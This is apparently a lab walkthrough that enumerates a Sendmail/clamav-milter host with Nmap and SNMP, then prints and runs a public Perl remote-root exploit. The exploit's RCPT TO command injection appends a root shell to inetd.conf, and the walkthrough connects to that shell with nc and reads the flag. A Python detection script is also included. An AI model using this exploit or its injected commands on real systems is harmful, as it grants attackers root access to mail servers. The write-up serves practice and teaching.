Nmap

TCP Ports

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-24 05:41 +08
Nmap scan report for 192.168.179.42
Host is up (0.040s latency).
Not shown: 65529 closed tcp ports (conn-refused)
PORT      STATE SERVICE
22/tcp    open  ssh
25/tcp    open  smtp
139/tcp   open  netbios-ssn
199/tcp   open  smux
445/tcp   open  microsoft-ds
60000/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 6.81 seconds

Quite a number of ports found, so let’s take a deeper look.

TCP Service Scan

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-24 05:41 +08
Nmap scan report for 192.168.179.42
Host is up (0.040s latency).

PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 3.8.1p1 Debian 8.sarge.6 (protocol 2.0)
| ssh-hostkey: 
|   1024 30:3e:a4:13:5f:9a:32:c0:8e:46:eb:26:b3:5e:ee:6d (DSA)
|_  1024 af:a2:49:3e:d8:f2:26:12:4a:a0:b5:ee:62:76:b0:18 (RSA)
25/tcp    open  smtp        Sendmail 8.13.4/8.13.4/Debian-3sarge3
| smtp-commands: localhost.localdomain Hello [192.168.45.164], pleased to meet you, ENHANCEDSTATUSCODES, PIPELINING, EXPN, VERB, 8BITMIME, SIZE, DSN, ETRN, DELIVERBY, HELP
|_ 2.0.0 This is sendmail version 8.13.4 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT DATA 2.0.0 RSET NOOP QUIT HELP VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0.0 STARTTLS 2.0.0 For more info use "HELP <topic>". 2.0.0 To report bugs in the implementation send email to 2.0.0 [email protected]. 2.0.0 For local information send email to Postmaster at your site. 2.0.0 End of HELP info
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
199/tcp   open  smux        Linux SNMP multiplexer
445/tcp   open  netbios-ssn Samba smbd 3.0.14a-Debian (workgroup: WORKGROUP)
60000/tcp open  ssh         OpenSSH 3.8.1p1 Debian 8.sarge.6 (protocol 2.0)
| ssh-hostkey: 
|   1024 30:3e:a4:13:5f:9a:32:c0:8e:46:eb:26:b3:5e:ee:6d (DSA)
|_  1024 af:a2:49:3e:d8:f2:26:12:4a:a0:b5:ee:62:76:b0:18 (RSA)
Service Info: Host: localhost.localdomain; OSs: Linux, Unix; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.14a-Debian)
|   NetBIOS computer name: 
|   Workgroup: WORKGROUP\x00
|_  System time: 2024-11-23T21:42:04-05:00
|_nbstat: NetBIOS name: 0XBABE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_clock-skew: mean: 7h29m57s, deviation: 3h32m08s, median: 4h59m56s
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-security-mode: 
|   account_used: guest
|   authentication_level: share (dangerous)
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 42.20 seconds

Port 25 seems interesting as it's running Sendmail, which accepts a range of SMTP commands. SMB on ports 139 & 445 doesn't give us much.

Port 199 (smux), however, suggests that SNMP might be running, so we should scan UDP ports for SNMP as well. SNMP can sometimes give away a lot of information.

UDP Ports

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-24 05:41 +08
Warning: 192.168.179.42 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.179.42
Host is up (0.045s latency).
Not shown: 65455 open|filtered udp ports (no-response), 78 closed udp ports (port-unreach)
PORT    STATE SERVICE
137/udp open  netbios-ns
161/udp open  snmp

Nmap done: 1 IP address (1 host up) scanned in 73.07 seconds

Looks like SNMP is indeed running, so let's enumerate it further with Nmap.

UDP Service Scan

The service scan gives us quite a bit of information for SNMP on port 161.

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-24 05:43 +08
Nmap scan report for 192.168.179.42
Host is up (0.040s latency).

PORT    STATE SERVICE    VERSION
137/udp open  netbios-ns Samba nmbd netbios-ns (workgroup: WORKGROUP)
| nbns-interfaces: 
|   hostname: 0XBABE
|   interfaces: 
|_    192.168.179.42
161/udp open  snmp       SNMPv1 server; U.C. Davis, ECE Dept. Tom SNMPv3 server (public)
| snmp-interfaces: 
|   lo
|     IP address: 127.0.0.1  Netmask: 255.0.0.0
|     Type: softwareLoopback  Speed: 10 Mbps
|     Traffic stats: 0.00 Kb sent, 0.00 Kb received
|   eth0
|     IP address: 192.168.179.42  Netmask: 255.255.255.0
|     MAC address: 00:50:56:ab:ff:3c (VMware)
|     Type: ethernetCsmacd  Speed: 100 Mbps
|_    Traffic stats: 3.99 Mb sent, 59.28 Mb received
| snmp-sysdescr: Linux 0xbabe.local 2.6.8-4-386 #1 Wed Feb 20 06:15:54 UTC 2008 i686
|_  System uptime: 1m44.36s (10436 timeticks)
| snmp-netstat: 
|   TCP  0.0.0.0:25           0.0.0.0:0
|   TCP  0.0.0.0:80           0.0.0.0:0
|   TCP  0.0.0.0:139          0.0.0.0:0
|   TCP  0.0.0.0:199          0.0.0.0:0
|   TCP  0.0.0.0:445          0.0.0.0:0
|   UDP  0.0.0.0:137          *:*
|   UDP  0.0.0.0:138          *:*
|   UDP  0.0.0.0:161          *:*
|   UDP  42.179.168.192:137   *:*
|_  UDP  42.179.168.192:138   *:*
| snmp-processes: 
|   1: 
|     Name: init
|     Path: init [2]
|   2: 
|     Name: ksoftirqd/0
|     Path: ksoftirqd/0
|   3: 
|     Name: events/0
|     Path: events/0
|   4: 
|     Name: khelper
|     Path: khelper
|   5: 
|     Name: kacpid
|     Path: kacpid
|   99: 
|     Name: kblockd/0
|     Path: kblockd/0
|   109: 
|     Name: pdflush
|     Path: pdflush
|   110: 
|     Name: pdflush
|     Path: pdflush
|   111: 
|     Name: kswapd0
|     Path: kswapd0
|   112: 
|     Name: aio/0
|     Path: aio/0
|   255: 
|     Name: kseriod
|     Path: kseriod
|   276: 
|     Name: scsi_eh_0
|     Path: scsi_eh_0
|   284: 
|     Name: khubd
|     Path: khubd
|   348: 
|     Name: shpchpd_event
|     Path: shpchpd_event
|   380: 
|     Name: kjournald
|     Path: kjournald
|   935: 
|     Name: vmmemctl
|     Path: vmmemctl
|   1177: 
|     Name: vmtoolsd
|     Path: /usr/sbin/vmtoolsd
|   3768: 
|     Name: syslogd
|     Path: /sbin/syslogd
|   3771: 
|     Name: klogd
|     Path: /sbin/klogd
|   3775: 
|     Name: clamd
|     Path: /usr/local/sbin/clamd
|   3779: 
|     Name: clamav-milter
|     Path: /usr/local/sbin/clamav-milter
|     Params: --black-hole-mode -l -o -q /var/run/clamav/clamav-milter.ctl
|   3788: 
|     Name: inetd
|     Path: /usr/sbin/inetd
|   3792: 
|     Name: nmbd
|     Path: /usr/sbin/nmbd
|     Params: -D
|   3794: 
|     Name: smbd
|     Path: /usr/sbin/smbd
|     Params: -D
|   3798: 
|     Name: snmpd
|     Path: /usr/sbin/snmpd
|     Params: -Lsd -Lf /dev/null -p /var/run/snmpd.pid
|   3800: 
|     Name: smbd
|     Path: /usr/sbin/smbd
|     Params: -D
|   3805: 
|     Name: sshd
|     Path: /usr/sbin/sshd
|   3883: 
|     Name: sendmail-mta
|     Path: sendmail: MTA: accepting connections
|   3902: 
|     Name: atd
|     Path: /usr/sbin/atd
|   3905: 
|     Name: cron
|     Path: /usr/sbin/cron
|   3912: 
|     Name: apache
|     Path: /usr/sbin/apache
|   3928: 
|     Name: getty
|     Path: /sbin/getty
|     Params: 38400 tty1
|   3934: 
|     Name: getty
|     Path: /sbin/getty
|     Params: 38400 tty2
|   3935: 
|     Name: getty
|     Path: /sbin/getty
|     Params: 38400 tty3
|   3936: 
|     Name: getty
|     Path: /sbin/getty
|     Params: 38400 tty4
|   3937: 
|     Name: getty
|     Path: /sbin/getty
|     Params: 38400 tty5
|   3938: 
|     Name: getty
|     Path: /sbin/getty
|     Params: 38400 tty6
|   3962: 
|     Name: apache
|     Path: /usr/sbin/apache
|   3963: 
|     Name: apache
|     Path: /usr/sbin/apache
|   3964: 
|     Name: apache
|     Path: /usr/sbin/apache
|   3965: 
|     Name: apache
|     Path: /usr/sbin/apache
|   3966: 
|     Name: apache
|_    Path: /usr/sbin/apache
| snmp-info: 
|   enterprise: U.C. Davis, ECE Dept. Tom
|   engineIDFormat: unknown
|   engineIDData: 9e325869f30c7749
|   snmpEngineBoots: 60
|_  snmpEngineTime: 1m44s
Service Info: Hosts: 0XBABE, 0xbabe.local

Host script results:
|_nbstat: NetBIOS name: 0XBABE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.34 seconds

UDP 161

Taking a brief look at the Nmap service scan output for UDP port 161, we see a clamav-milter process running that looks interesting. There's also a sendmail-mta process accepting connections.

PORT    STATE SERVICE    VERSION
161/udp open  snmp       SNMPv1 server; U.C. Davis, ECE Dept. Tom SNMPv3 server (public)
| snmp-interfaces: 
|   lo
|     IP address: 127.0.0.1  Netmask: 255.0.0.0
|     Type: softwareLoopback  Speed: 10 Mbps
|     Traffic stats: 0.00 Kb sent, 0.00 Kb received
|   eth0
|     IP address: 192.168.179.42  Netmask: 255.255.255.0
|     MAC address: 00:50:56:ab:ff:3c (VMware)
|     Type: ethernetCsmacd  Speed: 100 Mbps
|_    Traffic stats: 3.99 Mb sent, 59.28 Mb received
| snmp-sysdescr: Linux 0xbabe.local 2.6.8-4-386 #1 Wed Feb 20 06:15:54 UTC 2008 i686
|_  System uptime: 1m44.36s (10436 timeticks)
| snmp-netstat: 
|   TCP  0.0.0.0:25           0.0.0.0:0
|   TCP  0.0.0.0:80           0.0.0.0:0
|   TCP  0.0.0.0:139          0.0.0.0:0
|   TCP  0.0.0.0:199          0.0.0.0:0
|   TCP  0.0.0.0:445          0.0.0.0:0
|   UDP  0.0.0.0:137          *:*
|   UDP  0.0.0.0:138          *:*
|   UDP  0.0.0.0:161          *:*
|   UDP  42.179.168.192:137   *:*
|_  UDP  42.179.168.192:138   *:*
| snmp-processes: 
...<truncated>...
|   3775: 
|     Name: clamd
|     Path: /usr/local/sbin/clamd
|   3779: 
|     Name: clamav-milter
|     Path: /usr/local/sbin/clamav-milter
|     Params: --black-hole-mode -l -o -q /var/run/clamav/clamav-milter.ctl
...<truncated>...
|   3883: 
|     Name: sendmail-mta
|     Path: sendmail: MTA: accepting connections
...<truncated>...

clamav-milter

A quick Google search on clamav-milter.

There’s also an exploit in exploitdb: https://www.exploit-db.com/exploits/4761

clamav-milter Exploit

### black-hole.pl
### Sendmail w/ clamav-milter Remote Root Exploit
### Copyright (c) 2007 Eliteboy
########################################################
use IO::Socket;

print "Sendmail w/ clamav-milter Remote Root Exploit\n";
print "Copyright (C) 2007 Eliteboy\n";

if ($#ARGV != 0) {print "Give me a host to connect.\n";exit;}

print "Attacking $ARGV[0]...\n";

$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                              PeerPort => '25',
                              Proto    => 'tcp');

print $sock "ehlo you\r\n";
print $sock "mail from: <>\r\n";
print $sock "rcpt to: <nobody+\"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf\"@localhost>\r\n";
print $sock "rcpt to: <nobody+\"|/etc/init.d/inetd restart\"@localhost>\r\n";
print $sock "data\r\n.\r\nquit\r\n";

while (<$sock>) {
        print;
}

# milw0rm.com [2007-12-21]

The exploit appears to leverage Sendmail (which is also exposed on the target machine on port 25) to achieve remote code execution simply by sending an email.

print $sock "rcpt to: <nobody+\"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf\"@localhost>\r\n";

echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf

This particular recipient appends a line to /etc/inetd.conf that tells inetd to serve /bin/sh as root on port 31337. The second recipient then restarts inetd so the new entry takes effect.
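As an added example (not part of the original writeup, nor the exploit author's code), here is a small Python checker for the two traces this technique leaves behind: an RCPT TO address whose quoted local part pipes into a program, and an inetd.conf entry that hands out a shell as root. The SMTP lines and the inetd.conf excerpt are constructed samples that mirror the strings shown above.

```python
import re

# Constructed sample RCPT TO lines (not captured from the target); the second and
# third mirror the recipient strings the exploit above sends.
SAMPLE_SMTP_LINES = [
    "rcpt to: <ryu@localhost>",
    "rcpt to: <nobody+\"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf\"@localhost>",
    "rcpt to: <nobody+\"|/etc/init.d/inetd restart\"@localhost>",
    "rcpt to: <\"first last\"@localhost>",  # quoted local part without a pipe: legitimate
]

# Constructed /etc/inetd.conf excerpt ending with the line the exploit appends.
SAMPLE_INETD_CONF = """\
# /etc/inetd.conf: see inetd(8)
ident  stream  tcp  nowait  identd  /usr/sbin/identd identd
31337 stream tcp nowait root /bin/sh -i
"""

SHELLS = {"/bin/sh", "/bin/bash", "/bin/dash"}
# Greedy '.*' so the '>>' inside the injected command does not end the address early.
_RCPT_RE = re.compile(r"rcpt\s+to:\s*<(.*)>", re.IGNORECASE)

def extract_rcpt(line):
    """Return the address inside RCPT TO:<...>, or None for other lines."""
    m = _RCPT_RE.search(line)
    return m.group(1) if m else None

def is_pipe_recipient(addr):
    """True if a quoted segment of the local part (e.g. nobody+"|cmd") holds a pipe,
    i.e. the recipient is a program rather than a mailbox."""
    local = addr.rpartition("@")[0]
    return any("|" in quoted for quoted in re.findall(r'"([^"]*)"', local))

def find_pipe_recipients(lines):
    """Collect RCPT TO addresses that would pipe into a program."""
    hits = []
    for line in lines:
        addr = extract_rcpt(line)
        if addr is not None and is_pipe_recipient(addr):
            hits.append(addr)
    return hits

def find_root_shell_services(conf_text):
    """Return (service, program) for inetd.conf entries that run a shell as root.
    Field layout: service socket proto wait/nowait user[.group] program [args]."""
    flagged = []
    for raw in conf_text.splitlines():
        fields = raw.split("#", 1)[0].split()   # drop comments, then tokenize
        if len(fields) < 6:
            continue
        user = re.split(r"[.:]", fields[4])[0]   # 'root.root' or 'root:root' -> 'root'
        if user == "root" and fields[5] in SHELLS:
            flagged.append((fields[0], fields[5]))
    return flagged
```

Run find_pipe_recipients over mail server logs or an SMTP capture, and find_root_shell_services over the host's inetd.conf, to catch both halves of this attack.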

We confirm that 31337 is closed before running the exploit.

nmap -p31337 192.168.179.42
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-24 05:56 +08
Nmap scan report for 192.168.179.42
Host is up (0.040s latency).

PORT      STATE  SERVICE
31337/tcp closed Elite

Nmap done: 1 IP address (1 host up) scanned in 0.16 seconds

Running the Exploit

perl black-hole.pl 192.168.179.42
Sendmail w/ clamav-milter Remote Root Exploit
Copyright (C) 2007 Eliteboy
Attacking 192.168.179.42...
220 localhost.localdomain ESMTP Sendmail 8.13.4/8.13.4/Debian-3sarge3; Sat, 23 Nov 2024 21:57:06 -0500; (No UCE/UBE) logging access from: [192.168.45.164](FAIL)-[192.168.45.164]
250-localhost.localdomain Hello [192.168.45.164], pleased to meet you
250-ENHANCEDSTATUSCODES
250-PIPELINING
250-EXPN
250-VERB
250-8BITMIME
250-SIZE
250-DSN
250-ETRN
250-DELIVERBY
250 HELP
250 2.1.0 <>... Sender ok
250 2.1.5 <nobody+"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf">... Recipient ok
250 2.1.5 <nobody+"|/etc/init.d/inetd restart">... Recipient ok
354 Enter mail, end with "." on a line by itself
250 2.0.0 4AO2v6NO004068 Message accepted for delivery
221 2.0.0 localhost.localdomain closing connection
nmap -p31337 192.168.179.42
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-24 05:57 +08
Nmap scan report for 192.168.179.42
Host is up (0.040s latency).

PORT      STATE SERVICE
31337/tcp open  Elite

Nmap done: 1 IP address (1 host up) scanned in 0.14 seconds

After running the exploit, the port is open.

proof.txt

Connecting via nc, we indeed get a root shell. Since we are already root, there is no point in upgrading the shell. Additionally, there isn't a local.txt on this machine, as the home directory of the only user, ryu, does not contain it.

rlwrap nc 192.168.179.42 31337
id
uid=0(root) gid=0(root) groups=0(root)

pwd
/

cd root

ls
dbootstrap_settings
install-report.template
proof.txt

cat proof.txt
8834dace65e1a28aa842490b7aff7e3f

cd /home

ls
ryu

cd ryu

ls -al
total 16
drwxr-xr-x  2 1000  1000 4096 Jan 19  2009 .
drwxrwsr-x  3 root staff 4096 Jan 19  2009 ..
-rw-r--r--  1 1000  1000  567 Jan 19  2009 .bash_profile
-rw-r--r--  1 1000  1000 1834 Jan 19  2009 .bashrc